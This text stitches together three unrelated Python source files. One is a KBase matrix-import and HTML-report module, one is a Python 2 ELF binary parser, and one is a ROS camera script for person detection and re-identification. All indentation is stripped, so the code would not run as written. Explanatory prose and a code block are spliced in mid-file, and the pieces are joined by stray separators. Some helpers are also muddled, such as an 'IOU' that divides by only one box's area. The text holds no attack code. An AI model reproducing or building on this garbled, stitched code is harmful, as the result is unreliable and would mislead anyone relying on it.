report_template = report_template.replace('<p>Visualization_Content</p>',
visualization_content)
result_file.write(report_template)
report_shock_id = self.dfu.file_to_shock({'file_path': output_directory,
'pack': 'zip'})['shock_id']
html_report.append({'shock_id': report_shock_id,
'name': os.path.basename(result_file_path),
'label': os.path.basename(result_file_path),
'description': 'HTML summary report for Transform Matrix App'
})
return html_report
def _compute_cluster_label_order(self, values, labels):
# values = [[1, 0, 21, 50, 1], [20, 0, 60, 80, 30], [30, 60, 1, -10, 20]]
# labels = ['model_1', 'model_2', 'model_3']
if len(labels) == 1:
return labels
dist_matrix = pdist(values)
linkage_matrix = linkage(dist_matrix, 'ward')
dn = dendrogram(linkage_matrix, labels=labels, distance_sort='ascending')
ordered_label = dn['ivl']
return ordered_label
def _generate_chem_abund_heatmap_html_report(self, data, metadata_df):
logging.info('Start generating chemical abundance heatmap report page')
data_df = pd.DataFrame(data['values'], index=data['row_ids'], columns=data['col_ids'])
result_directory = os.path.join(self.scratch, str(uuid.uuid4()))
self._mkdir_p(result_directory)
group_by = ['chemical_type', 'units']
metadata_groups = metadata_df.groupby(by=group_by).groups
data_groups = dict()
for group_name, ids in metadata_groups.items():
chem_type_data = data_df.loc[ids]
idx_ordered_label = self._compute_cluster_label_order(chem_type_data.values.tolist(),
chem_type_data.index.tolist())
data_groups[group_name] = chem_type_data.reindex(index=idx_ordered_label)
output_directory = os.path.join(self.scratch, str(uuid.uuid4()))
logging.info('Start generating html report in {}'.format(output_directory))
html_report = list()
self._mkdir_p(output_directory)
result_file_path = os.path.join(output_directory, 'matrix_viewer_report.html')
visualization_content = self._generate_chem_visualization_content(output_directory,
data_groups)
with open(result_file_path, 'w') as result_file:
with open(os.path.join(os.path.dirname(__file__), 'templates', 'matrix_template.html'),
'r') as report_template_file:
report_template = report_template_file.read()
report_template = report_template.replace('<p>Visualization_Content</p>',
visualization_content)
result_file.write(report_template)
report_shock_id = self.dfu.file_to_shock({'file_path': output_directory,
'pack': 'zip'})['shock_id']
html_report.append({'shock_id': report_shock_id,
'name': os.path.basename(result_file_path),
'label': os.path.basename(result_file_path),
'description': 'HTML summary report for Import Matrix App'
})
return html_report
def _generate_heatmap_html_report(self, data):
logging.info('Start generating heatmap report page')
data_df = pd.DataFrame(data['values'], index=data['row_ids'], columns=data['col_ids'])
result_directory = os.path.join(self.scratch, str(uuid.uuid4()))
self._mkdir_p(result_directory)
tsv_file_path = os.path.join(result_directory, 'heatmap_data_{}.tsv'.format(
str(uuid.uuid4())))
data_df.to_csv(tsv_file_path)
heatmap_dir = self.report_util.build_heatmap_html({
'tsv_file_path': tsv_file_path,
'cluster_data': True})['html_dir']
top_heatmap_dir = None
top_percent = 100
if len(data_df.index) > 500:
display_count = 200  # rough count of items to display
top_percent = min(int(display_count / len(data_df.index) * 100), 100)
top_percent = max(top_percent, 1)
top_heatmap_dir = self.report_util.build_heatmap_html({
'tsv_file_path': tsv_file_path,
'sort_by_sum': True,
'top_percent': top_percent})['html_dir']
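The thresholding above can be sketched as a standalone helper (the function name is ours, and the defaults mirror the constants used in `_generate_heatmap_html_report`): matrices over 500 rows are trimmed to roughly 200 display items, expressed as a percentage clamped to [1, 100].

```python
def display_top_percent(n_rows, display_count=200, threshold=500):
    """Sketch of the clamping logic above: for large matrices, compute the
    percentage of rows to display so that roughly `display_count` items
    remain, clamped to the range [1, 100]."""
    if n_rows <= threshold:
        return 100
    top_percent = min(int(display_count / n_rows * 100), 100)
    return max(top_percent, 1)
```

The lower clamp matters for very large matrices, where the raw percentage would truncate to 0 and hide everything.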
output_directory = os.path.join(self.scratch, str(uuid.uuid4()))
logging.info('Start generating html report in {}'.format(output_directory))
html_report = list()
self._mkdir_p(output_directory)
result_file_path = os.path.join(output_directory, 'matrix_viewer_report.html')
visualization_content = self._generate_visualization_content(output_directory,
heatmap_dir,
data_df,
top_heatmap_dir,
top_percent)
with open(result_file_path, 'w') as result_file:
with open(os.path.join(os.path.dirname(__file__), 'templates', 'matrix_template.html'),
'r') as report_template_file:
report_template = report_template_file.read()
report_template = report_template.replace('<p>Visualization_Content</p>',
visualization_content)
result_file.write(report_template)
report_shock_id = self.dfu.file_to_shock({'file_path': output_directory,
'pack': 'zip'})['shock_id']
html_report.append({'shock_id': report_shock_id,
'name': os.path.basename(result_file_path),
'label': os.path.basename(result_file_path),
'description': 'HTML summary report for Import Matrix App'
})
return html_report
def _generate_rarefy_report(self, new_matrix_obj_ref, workspace_id,
random_rare_df, rarecurve_image, obs_vs_rare_image,
warnings):
objects_created = [{'ref': new_matrix_obj_ref, 'description': 'Randomly Rarefied Matrix'}]
data_tsv_directory = os.path.join(self.scratch, str(uuid.uuid4()))
self._mkdir_p(data_tsv_directory)
logging.info('Start generating matrix tsv files in {}'.format(data_tsv_directory))
rarefied_matrix_tsv_path = os.path.join(data_tsv_directory,
'rarefied_matrix_{}.tsv'.format(
str(uuid.uuid4())))
random_rare_df.to_csv(rarefied_matrix_tsv_path)
rarefied_matrix_dir = self.report_util.build_heatmap_html({
'tsv_file_path': rarefied_matrix_tsv_path,
'cluster_data': True})['html_dir']
output_html_files = self._generate_rarefy_html_report(rarefied_matrix_dir,
rarecurve_image,
obs_vs_rare_image,
random_rare_df)
report_params = {'message': '',
'objects_created': objects_created,
'workspace_id': workspace_id,
'html_links': output_html_files,
'direct_html_link_index': 0,
'html_window_height': 1400,
'report_object_name': 'rarefy_matrix_' + str(uuid.uuid4()),
'warnings': warnings}
kbase_report_client = KBaseReport(self.callback_url, token=self.token)
output = kbase_report_client.create_extended_report(report_params)
report_output = {'report_name': output['name'], 'report_ref': output['ref']}
return report_output
def _generate_transform_report(self, new_matrix_obj_ref, workspace_id,
operations, df_results, variable_specific=False):
objects_created = [{'ref': new_matrix_obj_ref, 'description': 'Transformed Matrix'}]
data_tsv_directory = os.path.join(self.scratch, str(uuid.uuid4()))
self._mkdir_p(data_tsv_directory)
heatmap_html_dir_l = []
for i, (op, df) in enumerate(zip(operations, df_results)):
tsv_path = os.path.join(data_tsv_directory, 'op%d_%s.tsv' % (i, op))
df.to_csv(tsv_path)
heatmap_html_dir = self.report_util.build_heatmap_html({
'tsv_file_path': tsv_path,
'cluster_data': True
})['html_dir']
heatmap_html_dir_l.append(heatmap_html_dir)
output_html_files = self._generate_transform_html_report(operations, heatmap_html_dir_l,
df_results[-1],
variable_specific)
report_params = {'message': '',
'objects_created': objects_created,
'workspace_id': workspace_id,
'html_links': output_html_files,
'direct_html_link_index': 0,
'html_window_height': 1400,
'report_object_name': 'transform_matrix_' + str(uuid.uuid4())}
kbase_report_client = KBaseReport(self.callback_url, token=self.token)
output = kbase_report_client.create_extended_report(report_params)
report_output = {'report_name': output['name'], 'report_ref': output['ref']}
return report_output
def _generate_mantel_test_report(self, workspace_id, pwmantel_res):
output_html_files = self._generate_mantel_test_html_report(pwmantel_res)
report_params = {'message': '',
'workspace_id': workspace_id,
'html_links': output_html_files,
'direct_html_link_index': 0,
'html_window_height': 300,
'report_object_name': 'mantel_test_' + str(uuid.uuid4())}
kbase_report_client = KBaseReport(self.callback_url, token=self.token)
output = kbase_report_client.create_extended_report(report_params)
report_output = {'report_name': output['name'], 'report_ref': output['ref']}
return report_output
def _generate_simper_report(self, workspace_id, simper_ret, simper_sum,
species_stats, grouping_names):
output_html_files = self._generate_simper_html_report(simper_ret, simper_sum,
species_stats, grouping_names)
report_params = {'message': '',
'workspace_id': workspace_id,
'html_links': output_html_files,
'direct_html_link_index': 0,
'html_window_height': 450,
'report_object_name': 'simper_' + str(uuid.uuid4())}
kbase_report_client = KBaseReport(self.callback_url, token=self.token)
output = kbase_report_client.create_extended_report(report_params)
report_output = {'report_name': output['name'], 'report_ref': output['ref']}
return report_output
def _generate_variable_stats_report(self, workspace_id,
anosim_res, permanova_res, permdisp_res):
output_html_files = self._generate_variable_stats_html_report(anosim_res,
permanova_res,
permdisp_res)
report_params = {'message': '',
'workspace_id': workspace_id,
'html_links': output_html_files,
'direct_html_link_index': 0,
'html_window_height': 450,
'report_object_name': 'variable_stats_' + str(uuid.uuid4())}
kbase_report_client = KBaseReport(self.callback_url, token=self.token)
output = kbase_report_client.create_extended_report(report_params)
report_output = {'report_name': output['name'], 'report_ref': output['ref']}
return report_output
def _generate_report(self, matrix_obj_ref, workspace_name, new_row_attr_ref=None,
new_col_attr_ref=None, data=None, metadata_df=None):
"""
_generate_report: generate summary report
"""
objects_created = [{'ref': matrix_obj_ref, 'description': 'Imported Matrix'}]
if new_row_attr_ref:
objects_created.append({'ref': new_row_attr_ref,
'description': 'Imported Row Attribute Mapping'})
if new_col_attr_ref:
objects_created.append({'ref': new_col_attr_ref,
'description': 'Imported Column Attribute Mapping'})
if data:
if metadata_df is not None:
output_html_files = self._generate_chem_abund_heatmap_html_report(data,
metadata_df)
else:
output_html_files = self._generate_heatmap_html_report(data)
report_params = {'message': '',
'objects_created': objects_created,
'workspace_name': workspace_name,
'html_links': output_html_files,
'direct_html_link_index': 0,
'html_window_height': 1400,
'report_object_name': 'import_matrix_from_excel_' + str(uuid.uuid4())}
else:
report_params = {'message': '',
'objects_created': objects_created,
'workspace_name': workspace_name,
'report_object_name': 'import_matrix_from_excel_' + str(uuid.uuid4())}
kbase_report_client = KBaseReport(self.callback_url, token=self.token)
output = kbase_report_client.create_extended_report(report_params)
report_output = {'report_name': output['name'], 'report_ref': output['ref']}
return report_output
@staticmethod
def _process_mapping_sheet(file_path, sheet_name):
"""
_process_mapping: process mapping sheet
"""
try:
df = pd.read_excel(file_path, sheet_name=sheet_name, dtype='str')
except XLRDError:
return dict()
else:
mapping = {value[0]: value[1] for value in df.values.tolist()}
return mapping
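The mapping construction in `_process_mapping_sheet` reduces to a dict comprehension over two-column rows (what `df.values.tolist()` yields for a two-column sheet). A minimal sketch with made-up data; note that a duplicated key in the sheet would silently keep only the last row:

```python
# Hypothetical two-column rows, as pd.read_excel(...).values.tolist() would
# return them for a key/value mapping sheet.
rows = [['kegg', 'C00031'], ['chebi', 'CHEBI:17234']]

# First column becomes the key, second the value; later rows overwrite
# earlier ones on key collision.
mapping = {row[0]: row[1] for row in rows}
```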
def _process_attribute_mapping_sheet(self, file_path, sheet_name, matrix_name, workspace_id):
"""
_process_attribute_mapping_sheet: process attribute_mapping sheet
"""
try:
df = pd.read_excel(file_path, sheet_name=sheet_name, index_col=0)
except XLRDError:
return ''
else:
obj_name = f'{matrix_name}_{sheet_name}'
result_directory = os.path.join(self.scratch, str(uuid.uuid4()))
self._mkdir_p(result_directory)
file_path = os.path.join(result_directory, '{}.xlsx'.format(obj_name))
df.to_excel(file_path)
import_attribute_mapping_params = {
'output_obj_name': obj_name,
'output_ws_id': workspace_id,
'input_file_path': file_path
}
ref = self.attr_util.file_to_attribute_mapping(import_attribute_mapping_params)
return ref.get('attribute_mapping_ref')
@staticmethod
def _file_to_df(file_path):
logging.info('start parsing file content to data frame')
try:
df = pd.read_excel(file_path, sheet_name='data', index_col=0)
except XLRDError:
try:
df = pd.read_excel(file_path, index_col=0)
logging.warning('WARNING: A sheet named "data" was not found in the attached file,'
' proceeding with the first sheet as the data sheet.')
except XLRDError:
try:
reader = pd.read_csv(file_path, sep=None, iterator=True)
# note: relies on pandas' private parser internals to recover the sniffed delimiter
inferred_sep = reader._engine.data.dialect.delimiter
df = pd.read_csv(file_path, sep=inferred_sep, index_col=0)
except Exception:
raise ValueError(
'Cannot parse file. Please provide a valid TSV, Excel or CSV file')
# remove NaN indexed rows
df = df[df.index.notnull()]
df.index = df.index.astype('str')
df.columns = df.columns.astype('str')
# fill NA with "None" so that they are properly represented as nulls in the KBase Object
df = df.where((pd.notnull(df)), None)
return df
@staticmethod
def _check_df_col_inclusive(df, col_name, valid_values):
# check that every value in the given column is one of valid_values
if col_name not in df:
raise ValueError('Please provide {} column'.format(col_name))
unmatched_type = set(df[col_name]) - valid_values
if unmatched_type:
err_msg = 'Found unsupported {}: {}\n'.format(' '.join(col_name.split('_')),
unmatched_type)
err_msg += 'Please use one of {} as {}'.format(valid_values,
' '.join(col_name.split('_')))
raise ValueError(err_msg)
@staticmethod
def _check_df_col_non_empty(df, col_name):
if col_name not in df:
raise ValueError('Please provide {} column'.format(col_name))
# check if any cell in the column is empty (NaN)
if df[col_name].isna().any():
empty_idx = list(df.loc[df[col_name].isna()].index)
raise ValueError('Missing [{}] value for index: {}'.format(col_name, empty_idx))
def _cal_identification_level(self, df, ids_df):
logging.info('Start calculating measured identification level')
identification_level = list()
high_level_keys = {'kegg', 'chebi', 'modelseed', 'inchikey', 'inchi', 'smiles'}
medium_level_keys = {'formula', 'compound_name'}
low_level_keys = {'mass'}
for idx in df.index:
db_ids = ids_df.loc[idx]
db_ids.dropna(inplace=True)
non_empty_ids_keys = set(db_ids.index)
if non_empty_ids_keys & high_level_keys:
identification_level.append('high')
| |
"""
Kenshoto's Elf parser
This package will let you use programmatic ninja-fu
when trying to parse Elf binaries. The API is based
around several objects representing constructs in the
Elf binary format. The Elf object itself contains
parsed metadata and lists of things like section headers
and relocation entries. Additionally, most of the
objects implement repr() in some form or another which
allows you a bunch of readelf-like functionality.
*Eventually* this API will allow you to modify Elf binaries
and spit them back out in working order (not complete, you
may notice some of the initial code).
Send bug reports to Invisigoth or Metr0.
"""
# Copyright (C) 2007 Invisigoth - See LICENSE file for details
import os
import sys
import struct
import traceback
import zlib
from stat import *
from Elf.elf_lookup import *
verbose = False
class Elf:
"""
An Elf object representation which allows manipulation
and parsing of Elf executables. Brought to you by
kenshoto.
"""
def __init__(self, initstr):
"""
Constructacon: initstr can be a filename, or a big hunka Elf lovin
(If you only give it 52 bytes, it'll just parse the header; if you give it
more, it *will* assume it has the whole thing...)
"""
self.sections = []
self.pheaders = []
self.secnames = {}
self.symbols = []
self.symbols_by_name = {}
self.symbols_by_addr = {}
self.e_ident = "NOTHINGHEREATALL"
self.e_type = 0
self.e_machine = 0
self.e_version = 0
self.e_entry = 0
self.e_phoff = 0
self.e_shoff = 0
self.e_flags = 0
self.e_ehsize = 0
self.e_phentsize = 0
self.e_phnum = 0
self.e_shentsize = 0
self.e_shnum = 0
self.e_shstrndx = 0
self.fmt = "2HI3LI6H"
self.hdrlen = struct.calcsize(self.fmt) + 16
self.myname = "unknown"
bytes = initstr
pbase = self.hdrlen
sbase = self.hdrlen
if len(initstr) > 0:
if not '\000' in initstr and os.path.exists(initstr):
bytes = file(initstr, "rb").read()
self.myname = initstr
self.initFromBytes(bytes)
# If we only got the 52 bytes, we have
# no symbols to parse etc...
if len(bytes) == self.hdrlen:
return
if self.e_shoff < self.e_phoff:
raise Exception("ERROR: we only support <elf hdr><pgrm hdrs><data><sec hdrs> format now")
# Load up any program headers we find
if self.e_phoff:
pbase = self.e_phoff
plen = self.e_phentsize
for i in range(self.e_phnum):
if self.bits == 32:
pgm = Elf32Pheader(bytes[pbase:pbase+plen],elf=self)
else:
pgm = Elf64Pheader(bytes[pbase:pbase+plen],elf=self)
self.pheaders.append(pgm)
pbase += plen
# Load up all the section headers
if self.e_shoff:
# Load up the sections
sbase = self.e_shoff
# FIXME this assumes static sized section headers
slen = self.e_shentsize
for i in range(self.e_shnum):
if self.bits == 32:
sec = Elf32Section(bytes[sbase:sbase+slen],elf=self)
else:
sec = Elf64Section(bytes[sbase:sbase+slen],elf=self)
self.sections.append(sec)
sbase += slen
# Populate the section names
strsec = self.sections[self.e_shstrndx]
names = bytes[strsec.sh_offset:strsec.sh_offset+strsec.sh_size]
for sec in self.sections:
name = names[sec.sh_name:].split("\x00")[0]
if len(name) > 0:
sec.setName(name)
self.secnames[name] = sec
self.parseSymbols()
self.parseDynamic()
self.parseRelocs()
def getName(self):
return self.myname
def __str__(self):
""" Calls toString() to obtain a string summary of this ELF. Since no additional parameters make sense, the module-level default verbosity is used.
"""
return self.toString(verbose)
def toString(self, verbose=False):
""" Returns a string summary of this ELF. If (verbose) the summary will include Symbols, Relocs, Dynamics and Dynamic Symbol tables"""
mystr = "ELF HEADER OBJECT:" + self.myname
mystr+= "\n= Intimate Details:"
mystr+= "\n==Magic:\t\t\t\t" + self.e_ident
mystr+= "\n==Type:\t\t\t\t\t" + e_types.get(self.e_type)
mystr+= "\n==Machine Arch:\t\t\t\t" + e_machine_types.get(self.e_machine)
mystr+= "\n==Version:\t\t\t\t%d" % (self.e_version)
mystr+= "\n==Entry:\t\t\t\t0x%.8x" % (self.e_entry)
mystr+= "\n==Program Headers(offset):\t\t%d (0x%x) bytes" % (self.e_phoff, self.e_phoff)
mystr+= "\n==Section Headers(offset):\t\t%d (0x%x) bytes" % (self.e_shoff, self.e_shoff)
mystr+= "\n==Flags:\t\t\t\t" + repr(self.e_flags) + " "
mystr+= "\n==Elf Header Size:\t\t\t" + repr(self.e_ehsize) + " (" + hex(self.e_ehsize) + " bytes)"
mystr+= "\n==Program Header Size:\t\t\t" + repr(self.e_phentsize) + " (" + hex(self.e_phentsize) + " bytes)"
mystr+= "\n==Program Header Count:\t\t\t" + repr(self.e_phnum) + " (" + hex(self.e_phnum)+ ")"
mystr+= "\n==Section Header Size:\t\t\t" + repr(self.e_shentsize) + " (" + hex(self.e_shentsize) + " bytes)"
mystr+= "\n==Section Header Count:\t\t\t" + repr(self.e_shnum) + " (" + hex(self.e_shnum) + ")"
mystr+= "\n==Section Header String Index\t\t" + repr(self.e_shstrndx) + " (" + hex(self.e_shstrndx) + ")"
mystr+= "\n\n= Sections:"
for sec in self.sections:
mystr+= "\n"+repr(sec)
mystr+= "\n\n= Program Headers:"
for ph in self.pheaders:
mystr+= "\n"+repr(ph)
if (verbose):
mystr+= "\n\n= Symbols table:"
for sym in self.symbols:
mystr+= "\n"+repr(sym)
mystr+= "\n\n= Relocation table:"
for reloc in self.relocs:
mystr+= "\n"+repr(reloc)
mystr+= "\n\n= Dynamics table:"
for dyn in self.dynamics:
mystr+= "\n"+repr(dyn)
mystr+= "\n\n= Dynamic Symbols table:"
for dyn in self.dynamic_symbols:
mystr+= "\n"+repr(dyn)
return mystr
def getStrtabString(self, offset, section=".strtab"):
bytes = self.getSection(section).getBytes()
index = bytes.find("\x00", offset)
return bytes[offset:index]
def initFromBytes(self, bytes):
if len(bytes) < self.hdrlen:
raise Exception("Elf format error: Not even a full Elf header (%d bytes)" % self.hdrlen)
if bytes[:4] <> "\x7fELF":
raise Exception("Elf format error: Elf magic not found")
self.e_ident = bytes[:16]
(self.e_type,
self.e_machine,
self.e_version,
self.e_entry,
self.e_phoff,
self.e_shoff,
self.e_flags,
self.e_ehsize,
self.e_phentsize,
self.e_phnum,
self.e_shentsize,
self.e_shnum,
self.e_shstrndx) = struct.unpack(self.fmt, bytes[16:self.hdrlen])
if self.e_machine in e_machine_32:
self.bits = 32
elif self.e_machine in e_machine_64:
self.bits = 64
else:
raise Exception("ERROR - Unknown 32/64 bit e_machine: %d. Add to e_machine_XX" % self.e_machine)
self.data = bytes
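The header round-trip performed by `initFromBytes()` and `buildHeader()` can be sketched in isolation: 16 identification bytes followed by the fields packed with the same `"2HI3LI6H"` format string the class uses. The field values below are synthetic, not from a real binary, and note that the format uses native sizes, so the packed length is platform-dependent (which is why the class computes `hdrlen` with `struct.calcsize`).

```python
import struct

# Same format string as Elf.fmt: e_type, e_machine, e_version, e_entry,
# e_phoff, e_shoff, e_flags, then the six 16-bit size/count fields.
fmt = "2HI3LI6H"
fields = (2, 3, 1, 0x8048000, 52, 2048, 0, 52, 32, 2, 40, 10, 9)

# 16-byte e_ident prefix: magic plus padding (synthetic, class/data/version
# bytes omitted for brevity).
e_ident = b"\x7fELF" + b"\x00" * 12

hdr = e_ident + struct.pack(fmt, *fields)

# Unpacking the tail of the header recovers the original fields, exactly
# as initFromBytes() does with bytes[16:self.hdrlen].
assert struct.unpack(fmt, hdr[16:]) == fields
```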
def buildHeader(self):
"""
Return the byte representation for *just* the elf header
for this elf.
"""
hdr = struct.pack(self.fmt,
self.e_type,
self.e_machine,
self.e_version,
self.e_entry,
self.e_phoff,
self.e_shoff,
self.e_flags,
self.e_ehsize,
self.e_phentsize,
self.e_phnum,
self.e_shentsize,
self.e_shnum,
self.e_shstrndx)
return self.e_ident + hdr
def serialize(self, filename=None):
"""
If filename is specified, serialize this elf object to the specified
file, otherwise return the bytes (read string) for this elf object
"""
# Get the Elf header
buf = self.buildHeader()
# Get the program headers
#FIXME assumes order
for pgm in self.pheaders:
buf += pgm.serialize()
phlen = self.e_phentsize * self.e_phnum
# Append the actual file data
buf += self.data[self.e_ehsize+phlen:self.e_shoff]
# Append the section headers
for sec in self.sections:
buf += sec.serialize()
if filename:
f = file(filename,'wb')
f.write(buf)
f.close()
return
return buf
def lookupSymbolName(self, name):
"""
Lookup symbol entries in this elf binary by name. The result is
a long representing the address for the given symbol. Or None if
it's not found.
"""
return self.symbols_by_name.get(name, None)
def lookupSymbolAddr(self, address):
"""
lookup symbols from this elf binary by address.
This returns the name for the given symbol or None for not found
"""
return self.symbols_by_addr.get(address, None)
def getBytes(self, offset, size, file_offset=True):
"""
Modification to the bytes this returns will NOT
be saved to the file bytes.
"""
return self.data[offset:offset+size]
def insertBytes(self, offset, bytes,section=None,file_offset=True):
"""
Insert the bytes argument at offset in the data.
The default will insert the bytes at that offset
from the beginning of the file (to ease calculations
that are based on header values). The caller may optionally
specify file_offset=False to have the offset be from
the beginning of self.data. If the inserted data falls
directly on a section boundary,
The optional "section" argument specifies which section
you would like to "own" the data (aka. which one gets its
length updated). If none, the bytes will push other data down
essentially into padding between sections...
THIS CODE DOES NOT WORK YET!
"""
ilen = len(bytes)
if section:
if ( offset < section.sh_offset or
offset > (section.sh_offset+section.sh_size)):
raise Exception("ERROR - Specified section in insertBytes has wrong offset/size: offset: %d" % offset)
section.sh_size += ilen
if file_offset:
offset -= self.getDataOffset()
self.data = self.data[:offset] + bytes + self.data[offset:]
#FIXME deal with program headers...
#for pgm in self.pheaders:
for sec in self.sections:
if offset <= (sec.sh_offset-self.getDataOffset()):
sec.sh_offset += ilen
if sec.sh_offset % sec.sh_addralign:
align = sec.sh_addralign - (sec.sh_offset % sec.sh_addralign)
off = sec.sh_offset - self.getDataOffset()
# Insert the pad bytes if this insert messes up alignment
self.data = self.data[:off] + "\x00" * align + self.data[off:]
sec.sh_offset += align
ilen += align
if offset < self.e_shoff:
self.e_shoff += ilen
print "INSERTED: ",ilen," bytes"
def getDataOffset(self):
return self.hdrlen + (self.e_phentsize * self.e_phnum)
def modifyBytes(self, offset, bytes, file_offset=True):
"""
Arguments are the same as insertBytes() except that
this method will OVERWRITE the bytes at that location
(which shouldn't cause any recalculation)
"""
blen = len(bytes)
if file_offset:
offset -= self.getDataOffset()
self.data = self.data[:offset] + bytes + self.data[offset+blen:]
def appendSection(self, section, name=None):
"""
Append the section to the Elf. The optional
name will be put into the | |
# repo: lusindazc/det_reid, file: multi_people/runcam11_goods_connected_multi-1217.py
#me : 2018-11-27
# @Author : <NAME>,<NAME>
# @Description : Give an interface to one cam
# @last_modification: 2018-12-10
#---------------------------------
import HKIPcamera
import cv2
from loadconfig import *
import rospy # Bingoren
from sensor_msgs.msg import CompressedImage #Bingo
from cv_bridge import CvBridge, CvBridgeError #Bingo
from utils import *
from darknet import Darknet
import os.path as osp
from reid.utils.serialization import load_checkpoint
from reid import models
from reid.feature_extraction import extract_cnn_feature
import publish_msg.publish_msg as pubmsg
import pickle
import torchvision.transforms as T
class_names = None
def compare_dic(dic1,dic2):
for i in (dic1):
for j in (dic2):
if i==j and dic1[i] != dic2[j]:
return True
return False
def exist_people(dic1):
for i in (dic1):
if dic1[i] == 1:
return True
return False
def diff_dic(dic2,dic1):
diff = []
for i in (dic1):
for j in (dic2):
if i==j and dic1[i]!= dic2[j]:
diff.append(i)
if not dic2.has_key(i):
diff.append(i)
return diff
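`diff_dic` above collects the ids whose flag changed between two snapshots, plus ids missing from the newer one. A compact modern equivalent in plain Python (the function name is ours), which avoids the Python 2 `has_key` and the nested loop:

```python
def changed_or_missing(old, new):
    """Keys of `old` whose value differs in `new`, plus keys of `old`
    that are absent from `new` (what diff_dic(dic2, dic1) returns)."""
    return [k for k in old if k not in new or new[k] != old[k]]
```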
def pairwise_distance(fea1, fea2):
fea1 = torch.squeeze(fea1,0)
fea1 = torch.squeeze(fea1,-1)
fea2 = torch.squeeze(fea2,0)
fea2 = torch.squeeze(fea2,-1)
x = fea1
y = fea2
m1,n=1,1
x = x.view(m1, -1)
y = y.view(n, -1)
dist = torch.pow(x, 2).sum(1).unsqueeze(1).expand(m1, n) + \
torch.pow(y, 2).sum(1).unsqueeze(1).expand(n, m1).t()
dist.addmm_(1, -2, x, y.t())  # legacy addmm_ signature: dist = 1*dist - 2 * x.mm(y.t())
return torch.sum(dist)
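`pairwise_distance` relies on the standard expansion of the squared Euclidean distance, ||x - y||^2 = ||x||^2 + ||y||^2 - 2<x, y>, which is what the `pow(...).sum(...)` terms and the `addmm_` call compute. The scalar identity in plain Python (no torch needed), with a name of our choosing:

```python
def squared_euclidean(x, y):
    """||x - y||^2 via the expansion ||x||^2 + ||y||^2 - 2 * <x, y>,
    mirroring the tensor computation in pairwise_distance()."""
    dot = sum(a * b for a, b in zip(x, y))
    return sum(a * a for a in x) + sum(b * b for b in y) - 2.0 * dot
```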
def jieduan(img,left,top,right,bottom):
imgg=np.zeros((bottom-top,right-left,3))
imgg = img[top:bottom, left:right, :]
return imgg
def calcIOU(p_x, p_y, p_bx, p_by, c_x, c_y, c_bx, c_by):
zh = c_x
c_x = c_bx#960 - c_x
c_bx = zh#960 - c_bx
condition1 = p_x >= c_x and p_x <= c_bx
condition2 = p_bx >= c_x and p_bx <= c_bx
condition3 = p_y >= c_y and p_y <= c_by
condition4 = p_by >= c_y and p_by <= c_by
#print p_x, p_y, p_bx, p_by, c_x, c_y, c_bx, c_by
if (condition1 and condition3) or (condition1 and condition4) or \
(condition2 and condition3) or (condition2 and condition4):
calcIOU = 1
else:
calcIOU = -1
return calcIOU
def calcIOU_old(one_x, one_y, one_w, one_h, two_x, two_y, two_w, two_h):
#one_x = 960-one_x
#one_w = 960-one_w
#zh=two_x
#two_x = two_m
#two_m = zh
#print one_x,one_m,two_x,two_m
#print one_y,one_n,two_y,two_n
#one_w = abs(one_x - one_m)
#one_h = abs(one_y - one_n)
#two_w = abs(two_x - two_m)
#two_h = abs(two_y - two_n)
#print one_w,one_h,two_w,two_h
if ((abs(one_x - two_x) < ((one_w + two_w) / 2.0)) and (abs(one_y - two_y) < ((one_h + two_h) / 2.0))):
lu_x_inter = max((one_x - (one_w / 2.0)), (two_x - (two_w / 2.0)))
lu_y_inter = min((one_y + (one_h / 2.0)), (two_y + (two_h / 2.0)))
rd_x_inter = min((one_x + (one_w / 2.0)), (two_x + (two_w / 2.0)))
rd_y_inter = max((one_y - (one_h / 2.0)), (two_y - (two_h / 2.0)))
inter_w = abs(rd_x_inter - lu_x_inter)
inter_h = abs(lu_y_inter - rd_y_inter)
inter_square = inter_w * inter_h
union_square = (one_w * one_h) + (two_w * two_h) - inter_square
#calcIOU = inter_square / union_square * 1.0
print two_w,two_h
calcIOU = inter_square / (abs(two_y-two_h)*abs(two_x-two_w))
print("calcIOU:", calcIOU)
else:
# print("No intersection!")
calcIOU = -1
return calcIOU
def newcalcIOU(two_x, two_y, two_w, two_h,one_x, one_y, one_w,one_h ):
zh = one_x
one_x = one_w#960-one_x
one_w = zh#960-one_w
S_rec1 = (one_w- one_x) * (one_h - one_y)
S_rec2 = (two_w - two_x) * (two_h - two_y)
sum_area = S_rec1 + S_rec2
left_line = max(one_x, two_x)
right_line = min(one_w, two_w)
top_line = max(one_y, two_y)
bottom_line = min(one_h, two_h)
# judge if there is an intersect
if left_line >= right_line or top_line >= bottom_line:
return -1
else:
intersect = (right_line - left_line) * (bottom_line - top_line)
#print intersect, S_rec2
iou = float(intersect) / S_rec2
#print("IOU:",iou)
return iou
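Despite its name, `newcalcIOU` does not return a symmetric intersection-over-union: after the x-coordinate swap, it divides the intersection area by the area of the first box group alone (`S_rec2`, the `two_*` arguments). A minimal sketch of that computation on plain `(left, top, right, bottom)` rectangles, with our own names and the same `-1` sentinel for disjoint boxes:

```python
def overlap_over_second(box1, box2):
    """Intersection area of two axis-aligned rectangles divided by the
    area of box2 only (not a symmetric IoU). Boxes are
    (left, top, right, bottom) with right > left and bottom > top."""
    left = max(box1[0], box2[0])
    top = max(box1[1], box2[1])
    right = min(box1[2], box2[2])
    bottom = min(box1[3], box2[3])
    if left >= right or top >= bottom:
        return -1  # no intersection, mirroring the sentinel above
    inter = (right - left) * (bottom - top)
    area2 = (box2[2] - box2[0]) * (box2[3] - box2[1])
    return float(inter) / area2
```

Dividing by one box's area makes the ratio asymmetric by design: it measures how much of the second box (here, the detection region) is covered, regardless of how large the other box is.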
def coordinate_IOU(two_x, two_y, two_w, two_h,one_x, one_y, one_w,one_h): # compute the coordinates of the intersection area
zh =one_x
one_x = one_w#960-one_x
one_w = zh#960-one_w
left_line = max(one_x, two_x)
right_line = min(one_w, two_w)
top_line = max(one_y, two_y)
bottom_line = min(one_h, two_h)
return left_line, top_line, right_line, bottom_line
# person detection and reid
def preprocess(img):
img = cv2.resize(img, (128,256))
img = test_transformer(img)
img = torch.unsqueeze(img, 0)
#print(img.shape)
return img
def reid_draw(frame, b_b, model, cfg):
global size
id_name = 'new'
cfg.cuda()
left=int((b_b[0] - b_b[2]/2.0) * size[0])
top=int((b_b[1]- b_b[3]/2.0) * size[1])
right=int((b_b[0] + b_b[2]/2.0) * size[0])
bottom=int((b_b[1] + b_b[3]/2.0) * size[1])
#print left,top,right,bottom
if left<0 or right< 0 or top <0 or bottom <0:
return left, top, right, bottom, id_name
img1 = jieduan(frame,left,top,right,bottom)
img = preprocess(img1)
feature = extract_cnn_feature(model, img.cuda())
minsim = -1
